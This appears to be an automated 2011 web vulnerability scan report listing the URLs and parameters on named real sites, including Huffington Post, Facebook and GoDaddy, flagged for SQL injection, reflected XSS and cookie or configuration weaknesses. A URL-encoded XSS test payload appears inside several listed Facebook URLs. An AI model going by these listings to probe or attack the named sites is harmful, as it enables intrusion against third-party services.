XSS, SQL Injection, HTTP Header Injection, Insecure Configuration, Information Disclosure, GHDB DORK Report 05052011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 05 13:09:24 CDT 2011.


1. SQL injection

1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]

2. Cross-site scripting (reflected)

2.1. http://www.aolnews.com/category/goodnews/ [REST URL parameter 2]

2.2. http://www.bankrate.com/funnel/mortgages/ [name of an arbitrarily supplied request parameter]

2.3. http://www.citysbest.com/ [icid parameter]

2.4. http://www.citysbest.com/ [name of an arbitrarily supplied request parameter]

2.5. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.6. http://www.citysbest.com/traffic/ [REST URL parameter 1]

2.7. http://www.dailyfinance.com/markets/mostactives [REST URL parameter 2]

2.8. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [REST URL parameter 2]

2.9. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx [name of an arbitrarily supplied request parameter]

2.10. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [REST URL parameter 3]

2.11. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx [name of an arbitrarily supplied request parameter]

2.12. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [REST URL parameter 3]

2.13. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx [name of an arbitrarily supplied request parameter]

2.14. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [REST URL parameter 3]

2.15. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx [name of an arbitrarily supplied request parameter]

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

2.17. http://www.huffingtonpost.com/ [icid parameter]

2.18. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

2.19. http://www.huffingtonpost.com/2011/05/02/ [name of an arbitrarily supplied request parameter]

2.20. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html [name of an arbitrarily supplied request parameter]

2.21. http://www.huffingtonpost.com/2011/05/04/ [name of an arbitrarily supplied request parameter]

2.22. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html [name of an arbitrarily supplied request parameter]

2.23. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html [name of an arbitrarily supplied request parameter]

2.24. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

2.25. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

2.26. http://www.huffingtonpost.com/advertise/ [name of an arbitrarily supplied request parameter]

2.27. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

2.28. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

2.29. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

2.30. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

2.31. http://www.huffingtonpost.com/users/logout/ [name of an arbitrarily supplied request parameter]

2.32. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 1]

2.33. http://www.marketwatch.com/News/Story/Story.aspx [REST URL parameter 2]

2.34. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.35. http://www.mmafighting.com/ [name of an arbitrarily supplied request parameter]

2.36. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.37. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ [name of an arbitrarily supplied request parameter]

2.38. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.39. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [icid parameter]

2.40. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.41. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

2.42. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

2.43. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

2.44. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

2.45. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

2.47. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

2.48. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

2.49. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

2.50. http://www.aol.com/ [dlact cookie]

2.51. http://www.aol.com/ [rrpmo1 cookie]

2.52. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

2.53. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

2.54. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

2.55. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

3. Flash cross-domain policy

3.1. http://www.aolcdn.com/crossdomain.xml

3.2. http://www.everydayhealth.com/crossdomain.xml

3.3. http://www.huffingtonpost.com/crossdomain.xml

3.4. http://www.mapquest.com/crossdomain.xml

3.5. http://xml.truveo.com/crossdomain.xml

3.6. http://www.aol.com/crossdomain.xml

3.7. http://www.aolnews.com/crossdomain.xml

3.8. http://www.apple.com/crossdomain.xml

3.9. http://www.blogsmithmedia.com/crossdomain.xml

3.10. http://www.citysbest.com/crossdomain.xml

3.11. http://www.dailyfinance.com/crossdomain.xml

3.12. http://www.dooce.com/crossdomain.xml

3.13. http://www.facebook.com/crossdomain.xml

3.14. https://www.facebook.com/crossdomain.xml

3.15. http://www.ft.com/crossdomain.xml

3.16. https://www.godaddy.com/crossdomain.xml

3.17. http://www.ibm.com/crossdomain.xml

3.18. http://www.marketwatch.com/crossdomain.xml

3.19. http://www.mmafighting.com/crossdomain.xml

3.20. http://www.moviefone.com/crossdomain.xml

3.21. http://www.netvibes.com/crossdomain.xml

3.22. http://www.pageflakes.com/crossdomain.xml

3.23. http://www.popeater.com/crossdomain.xml

3.24. http://www.realtytrac.com/crossdomain.xml

3.25. http://www.tuaw.com/crossdomain.xml

3.26. http://www.truveo.com/crossdomain.xml

4. Silverlight cross-domain policy

5. Cleartext submission of password

5.1. http://www.facebook.com/

5.2. http://www.facebook.com/r.php

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

6. SSL cookie without secure flag set

6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp

6.2. https://www.godaddy.com/

6.3. https://www.godaddy.com/domains/search.aspx

6.4. https://www.facebook.com/

6.5. https://www.facebook.com/ajax/intl/language_dialog.php

6.6. https://www.facebook.com/h02332

6.7. https://www.facebook.com/h02332

6.8. https://www.facebook.com/h02332

6.9. https://www.facebook.com/help/contact.php

6.10. https://www.facebook.com/login.php

6.11. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

6.12. https://www.facebook.com/pages/create.php

6.13. https://www.facebook.com/r.php

6.14. https://www.facebook.com/recover.php

6.15. https://www.godaddy.com/gdshop/hosting/landing.asp

6.16. https://www.godaddy.com/gdshop/registrar/search.asp

6.17. https://www.godaddy.com/gdshop/website.asp

7. Session token in URL

8. SSL certificate

8.1. https://www.facebook.com/

8.2. https://www.fightmagazine.com/

8.3. https://www.godaddy.com/

8.4. https://www.neodata.com/

9. ASP.NET ViewState without MAC enabled

9.1. http://www.bankrate.com/funnel/mortgages/

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

10. Cookie scoped to parent domain

10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

10.2. http://www.mapquest.com/

10.3. http://www.mapquest.com/_svc/ad/getads

10.4. http://www.mapquest.com/_svc/apixel

10.5. http://www.mapquest.com/_svc/publishing/promo

10.6. http://www.mapquest.com/_svc/searchio

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

10.9. http://www.mapquest.com/icons/stop.png

10.10. http://www.facebook.com/

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

10.12. http://www.facebook.com/10000082482078341583

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

10.14. http://www.facebook.com/1242845259

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

10.16. http://www.facebook.com/2008/fbml

10.17. http://www.facebook.com/AOLrealestate

10.18. http://www.facebook.com/BPAmerica

10.19. http://www.facebook.com/DailyFinance

10.20. http://www.facebook.com/HockeyKen

10.21. http://www.facebook.com/KickIceForever

10.22. http://www.facebook.com/LadyBonesie

10.23. http://www.facebook.com/Loizza

10.24. http://www.facebook.com/aim

10.25. http://www.facebook.com/ajax/intl/language_dialog.php

10.26. http://www.facebook.com/ajax/reg_birthday_help.php

10.27. http://www.facebook.com/ajax/register/logging.php

10.28. http://www.facebook.com/aol

10.29. http://www.facebook.com/aolradio

10.30. http://www.facebook.com/badges

10.31. http://www.facebook.com/burkerkink

10.32. http://www.facebook.com/campaign/landing.php

10.33. http://www.facebook.com/careers/

10.34. http://www.facebook.com/deedee.perez1

10.35. http://www.facebook.com/directory/pages/

10.36. http://www.facebook.com/directory/people/

10.37. http://www.facebook.com/facebook

10.38. http://www.facebook.com/fayse

10.39. http://www.facebook.com/find-friends

10.40. http://www.facebook.com/find-friends

10.41. http://www.facebook.com/gale.l.schenk

10.42. http://www.facebook.com/help/

10.43. http://www.facebook.com/help/

10.44. http://www.facebook.com/home.php

10.45. http://www.facebook.com/izaOllie

10.46. http://www.facebook.com/jezzas

10.47. http://www.facebook.com/kimberly.christ

10.48. http://www.facebook.com/ladonna.lokey

10.49. http://www.facebook.com/lakendra.roberts

10.50. http://www.facebook.com/login.php

10.51. http://www.facebook.com/login.php

10.52. http://www.facebook.com/mapquest

10.53. http://www.facebook.com/matthew.oliveira2

10.54. http://www.facebook.com/mmafighting

10.55. http://www.facebook.com/mobile

10.56. http://www.facebook.com/mobile/

10.57. http://www.facebook.com/mobile/

10.58. http://www.facebook.com/pages/Barnesville/115038011847083

10.59. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

10.64. http://www.facebook.com/pages/HMFIC/149403761740008

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902

10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

10.75. http://www.facebook.com/pages/create.php

10.76. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

10.77. http://www.facebook.com/patroyo

10.78. http://www.facebook.com/people/Alexander-Bucky%20-Jordan/1242845259

10.79. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.80. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

10.81. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783

10.82. http://www.facebook.com/people/Bucky-Jordan/100000824820783

10.83. http://www.facebook.com/policy.php

10.84. http://www.facebook.com/privacy/explanation.php

10.85. http://www.facebook.com/profile.php

10.86. http://www.facebook.com/r.php

10.87. http://www.facebook.com/recover.php

10.88. http://www.facebook.com/robynalys

10.89. http://www.facebook.com/share.php

10.90. http://www.facebook.com/sharer.php

10.91. http://www.facebook.com/skdarealist

10.92. http://www.facebook.com/sportingnews

10.93. http://www.facebook.com/stefanoboscolomarchi

10.94. http://www.facebook.com/techcrunch

10.95. http://www.facebook.com/terms.php

10.96. http://www.facebook.com/theteebers

10.97. http://www.facebook.com/wmoppert

10.98. https://www.facebook.com/

10.99. https://www.facebook.com/ajax/intl/language_dialog.php

10.100. https://www.facebook.com/h02332

10.101. https://www.facebook.com/h02332

10.102. https://www.facebook.com/h02332

10.103. https://www.facebook.com/help/contact.php

10.104. https://www.facebook.com/login.php

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.106. https://www.facebook.com/pages/create.php

10.107. https://www.facebook.com/r.php

10.108. https://www.facebook.com/recover.php

10.109. https://www.godaddy.com/

10.110. https://www.godaddy.com/domains/search.aspx

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp

10.112. https://www.godaddy.com/gdshop/registrar/search.asp

10.113. https://www.godaddy.com/gdshop/website.asp

10.114. http://www.google.com/finance

10.115. http://www.huffingtonpost.com/users/logout/

10.116. http://www.marketwatch.com/News/Story/Story.aspx

10.117. http://www.moviefone.com/

10.118. http://www.truveo.com/

10.119. http://www.truveo.com/search

11. Cookie without HttpOnly flag set

11.1. http://www.aol.com/

11.2. http://www.aol.com/ajax.jsp

11.3. http://www.crunchboard.com/opening/detailjob.php

11.4. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.5. https://www.fightmagazine.com/mma-magazine/subscribe.asp

11.6. https://www.godaddy.com/gdshop/catalog.asp

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/gdshop/registrar/search.asp

11.9. https://www.godaddy.com/gdshop/website.asp

11.10. http://www.mapquest.com/

11.11. http://www.mapquest.com/_svc/ad/getads

11.12. http://www.mapquest.com/_svc/apixel

11.13. http://www.mapquest.com/_svc/publishing/promo

11.14. http://www.mapquest.com/_svc/searchio

11.15. http://www.mapquest.com/cdn/_uac/adpage.htm

11.16. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

11.17. http://www.mapquest.com/icons/stop.png

11.18. http://www.mmawarehouse.com/

11.19. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

11.20. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

11.21. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

11.22. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

11.23. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

11.24. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

11.25. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

11.26. http://www.truveo.com/

11.27. http://www.truveo.com/search

11.28. http://yellowpages.aol.com/

11.29. http://www.citysbest.com/

11.30. http://www.dailyfinance.com/

11.31. http://www.dailyfinance.com/

11.32. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

11.33. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

11.34. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

11.35. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

11.36. http://www.facebook.com/

11.37. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

11.38. http://www.facebook.com/10000082482078341583

11.39. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

11.40. http://www.facebook.com/1242845259

11.41. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

11.42. http://www.facebook.com/2008/fbml

11.43. http://www.facebook.com/HockeyKen

11.44. http://www.facebook.com/KickIceForever

11.45. http://www.facebook.com/Loizza

11.46. http://www.facebook.com/burkerkink

11.47. http://www.facebook.com/careers/

11.48. http://www.facebook.com/deedee.perez1

11.49. http://www.facebook.com/directory/pages/

11.50. http://www.facebook.com/directory/people/

11.51. http://www.facebook.com/fayse

11.52. http://www.facebook.com/find-friends

11.53. http://www.facebook.com/gale.l.schenk

11.54. http://www.facebook.com/help/

11.55. http://www.facebook.com/izaOllie

11.56. http://www.facebook.com/jezzas

11.57. http://www.facebook.com/kimberly.christ

11.58. http://www.facebook.com/ladonna.lokey

11.59. http://www.facebook.com/lakendra.roberts

11.60. http://www.facebook.com/login.php

11.61. http://www.facebook.com/matthew.oliveira2

11.62. http://www.facebook.com/mobile/

11.63. http://www.facebook.com/pages/create.php

11.64. http://www.facebook.com/patroyo

11.65. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

11.66. http://www.facebook.com/people/Bucky-Jordan/100000824820783

11.67. http://www.facebook.com/privacy/explanation.php

11.68. http://www.facebook.com/robynalys

11.69. http://www.facebook.com/share.php

11.70. http://www.facebook.com/sharer.php

11.71. http://www.facebook.com/skdarealist

11.72. http://www.facebook.com/stefanoboscolomarchi

11.73. http://www.facebook.com/theteebers

11.74. http://www.facebook.com/wmoppert

11.75. https://www.facebook.com/

11.76. https://www.facebook.com/h02332

11.77. https://www.facebook.com/h02332

11.78. https://www.facebook.com/help/contact.php

11.79. https://www.facebook.com/login.php

11.80. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

11.81. https://www.facebook.com/pages/create.php

11.82. https://www.facebook.com/recover.php

11.83. https://www.godaddy.com/

11.84. https://www.godaddy.com/domains/search.aspx

11.85. http://www.google.com/finance

11.86. http://www.huffingtonpost.com/include/geopromo.php

11.87. http://www.huffingtonpost.com/users/logout/

11.88. http://www.mapquest.com/directions

11.89. http://www.mapquest.com/maps

11.90. http://www.mapquest.com/routeplanner

11.91. http://www.marketwatch.com/News/Story/Story.aspx

11.92. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

11.93. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

11.94. http://www.moviefone.com/

11.95. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.96. http://www.pageflakes.com/subscribe.aspx

11.97. http://www.popeater.com/

11.98. http://www.tuaw.com/hub/app-reviews

12. Password field with autocomplete enabled

12.1. http://www.facebook.com/

12.2. http://www.facebook.com/

12.3. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

12.4. http://www.facebook.com/10000082482078341583

12.5. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

12.6. http://www.facebook.com/1242845259

12.7. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

12.8. http://www.facebook.com/2008/fbml

12.9. http://www.facebook.com/AOLrealestate

12.10. http://www.facebook.com/BPAmerica

12.11. http://www.facebook.com/DailyFinance

12.12. http://www.facebook.com/HockeyKen

12.13. http://www.facebook.com/KickIceForever

12.14. http://www.facebook.com/LadyBonesie

12.15. http://www.facebook.com/Loizza

12.16. http://www.facebook.com/aim

12.17. http://www.facebook.com/ajax/intl/language_dialog.php

12.18. http://www.facebook.com/aol

12.19. http://www.facebook.com/aolradio

12.20. http://www.facebook.com/burkerkink

12.21. http://www.facebook.com/careers/

12.22. http://www.facebook.com/deedee.perez1

12.23. http://www.facebook.com/directory/pages/

12.24. http://www.facebook.com/directory/people/

12.25. http://www.facebook.com/facebook

12.26. http://www.facebook.com/fayse

12.27. http://www.facebook.com/find-friends

12.28. http://www.facebook.com/gale.l.schenk

12.29. http://www.facebook.com/help/

12.30. http://www.facebook.com/izaOllie

12.31. http://www.facebook.com/jezzas

12.32. http://www.facebook.com/kimberly.christ

12.33. http://www.facebook.com/ladonna.lokey

12.34. http://www.facebook.com/lakendra.roberts

12.35. http://www.facebook.com/login.php

12.36. http://www.facebook.com/matthew.oliveira2

12.37. http://www.facebook.com/mmafighting

12.38. http://www.facebook.com/mobile/

12.39. http://www.facebook.com/pages/Barnesville/115038011847083

12.40. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

12.41. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

12.42. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

12.43. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

12.44. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

12.45. http://www.facebook.com/pages/HMFIC/149403761740008

12.46. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

12.47. http://www.facebook.com/pages/Merchandiser/123981654314779

12.48. http://www.facebook.com/pages/New-Haven-College/130105783687523

12.49. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

12.50. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

12.51. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

12.52. http://www.facebook.com/pages/Sporting-News/104068362964496

12.53. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.54. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

12.55. http://www.facebook.com/pages/create.php

12.56. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

12.57. http://www.facebook.com/patroyo

12.58. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

12.59. http://www.facebook.com/people/Bucky-Jordan/100000824820783

12.60. http://www.facebook.com/plugins/facepile.php

12.61. http://www.facebook.com/plugins/likebox.php

12.62. http://www.facebook.com/policy.php

12.63. http://www.facebook.com/privacy/explanation.php

12.64. http://www.facebook.com/r.php

12.65. http://www.facebook.com/r.php

12.66. http://www.facebook.com/r.php

12.67. http://www.facebook.com/r.php

12.68. http://www.facebook.com/robynalys

12.69. http://www.facebook.com/share.php

12.70. http://www.facebook.com/sharer.php

12.71. http://www.facebook.com/skdarealist

12.72. http://www.facebook.com/sportingnews

12.73. http://www.facebook.com/stefanoboscolomarchi

12.74. http://www.facebook.com/techcrunch

12.75. http://www.facebook.com/terms.php

12.76. http://www.facebook.com/theteebers

12.77. http://www.facebook.com/wmoppert

12.78. https://www.facebook.com/

12.79. https://www.facebook.com/

12.80. https://www.facebook.com/ajax/intl/language_dialog.php

12.81. https://www.facebook.com/h02332

12.82. https://www.facebook.com/help/contact.php

12.83. https://www.facebook.com/login.php

12.84. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

12.85. https://www.facebook.com/pages/create.php

12.86. https://www.facebook.com/r.php

12.87. https://www.facebook.com/r.php

12.88. https://www.facebook.com/r.php

12.89. https://www.facebook.com/recover.php

12.90. https://www.godaddy.com/

12.91. https://www.godaddy.com/domains/search.aspx

12.92. https://www.godaddy.com/gdshop/hosting/landing.asp

12.93. http://www.marketwatch.com/News/Story/Story.aspx

12.94. http://www.marketwatch.com/News/Story/Story.aspx

12.95. http://www.marketwatch.com/News/Story/Story.aspx

12.96. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

12.97. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

12.98. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

13. ASP.NET debugging enabled

13.1. http://www.eyewonderlabs.com/Default.aspx

13.2. http://www.pageflakes.com/Default.aspx

14. Referer-dependent response

14.1. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

14.2. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

14.3. http://www.facebook.com/login.php

14.4. http://www.facebook.com/plugins/activity.php

14.5. http://www.facebook.com/plugins/like.php

14.6. http://www.facebook.com/plugins/likebox.php

14.7. http://www.facebook.com/plugins/recommendations.php

14.8. http://www.facebook.com/policy.php

14.9. https://www.facebook.com/

14.10. https://www.facebook.com/h02332

14.11. https://www.facebook.com/help/contact.php

14.12. http://www.huffingtonpost.com/

14.13. http://www.tuaw.com/hub/app-reviews

15. Cross-domain POST

15.1. http://www.dailyfinance.com/

15.2. http://www.dailyfinance.com/markets/mostactives

15.3. http://www.lakewoodbeacon.org/

16. Cross-domain Referer leakage

16.1. http://www.aol.com/ajax.jsp

16.2. http://www.aol.com/ajax.jsp

16.3. http://www.aol.com/ajax.jsp

16.4. http://www.aol.com/ajax.jsp

16.5. http://www.aol.com/ajax.jsp

16.6. http://www.aol.com/ajax.jsp

16.7. http://www.aol.com/ajax.jsp

16.8. http://www.aol.com/ajax.jsp

16.9. http://www.aol.com/ajax.jsp

16.10. http://www.aol.com/ajax.jsp

16.11. http://www.aol.com/ajax.jsp

16.12. http://www.aol.com/ajax.jsp

16.13. http://www.aol.com/ajax.jsp

16.14. http://www.aol.com/ajax.jsp

16.15. http://www.aol.com/ajax.jsp

16.16. http://www.aol.com/ajax.jsp

16.17. http://www.aol.com/ajax.jsp

16.18. http://www.aol.com/ajax.jsp

16.19. http://www.aol.com/ajax.jsp

16.20. http://www.aol.com/ajax.jsp

16.21. http://www.aol.com/ajax.jsp

16.22. http://www.aol.com/ajax.jsp

16.23. http://www.aol.com/ajax.jsp

16.24. http://www.aol.com/ajax.jsp

16.25. http://www.apple.com/itunes/affiliates/download/

16.26. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

16.27. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js

16.28. http://www.citysbest.com/

16.29. http://www.dailyfinance.com/

16.30. http://www.facebook.com/BPAmerica

16.31. http://www.facebook.com/ajax/intl/language_dialog.php

16.32. http://www.facebook.com/careers/

16.33. http://www.facebook.com/find-friends

16.34. http://www.facebook.com/find-friends

16.35. http://www.facebook.com/help/

16.36. http://www.facebook.com/help/

16.37. http://www.facebook.com/help/

16.38. http://www.facebook.com/login.php

16.39. http://www.facebook.com/mobile/

16.40. http://www.facebook.com/mobile/

16.41. http://www.facebook.com/pages/create.php

16.42. http://www.facebook.com/plugins/activity.php

16.43. http://www.facebook.com/plugins/activity.php

16.44. http://www.facebook.com/plugins/activity.php

16.45. http://www.facebook.com/plugins/activity.php

16.46. http://www.facebook.com/plugins/comments.php

16.47. http://www.facebook.com/plugins/comments.php

16.48. http://www.facebook.com/plugins/comments.php

16.49. http://www.facebook.com/plugins/facepile.php

16.50. http://www.facebook.com/plugins/like.php

16.51. http://www.facebook.com/plugins/like.php

16.52. http://www.facebook.com/plugins/likebox.php

16.53. http://www.facebook.com/plugins/likebox.php

16.54. http://www.facebook.com/plugins/likebox.php

16.55. http://www.facebook.com/plugins/likebox.php

16.56. http://www.facebook.com/plugins/likebox.php

16.57. http://www.facebook.com/plugins/likebox.php

16.58. http://www.facebook.com/plugins/likebox.php

16.59. http://www.facebook.com/plugins/likebox.php

16.60. http://www.facebook.com/plugins/likebox.php

16.61. http://www.facebook.com/plugins/likebox.php

16.62. http://www.facebook.com/plugins/likebox.php

16.63. http://www.facebook.com/plugins/likebox.php

16.64. http://www.facebook.com/plugins/likebox.php

16.65. http://www.facebook.com/plugins/likebox.php

16.66. http://www.facebook.com/plugins/likebox.php

16.67. http://www.facebook.com/plugins/likebox.php

16.68. http://www.facebook.com/plugins/recommendations.php

16.69. http://www.facebook.com/plugins/recommendations.php

16.70. http://www.facebook.com/plugins/recommendations.php

16.71. http://www.facebook.com/plugins/send.php

16.72. http://www.facebook.com/plugins/send.php

16.73. http://www.facebook.com/r.php

16.74. http://www.facebook.com/r.php

16.75. http://www.facebook.com/share.php

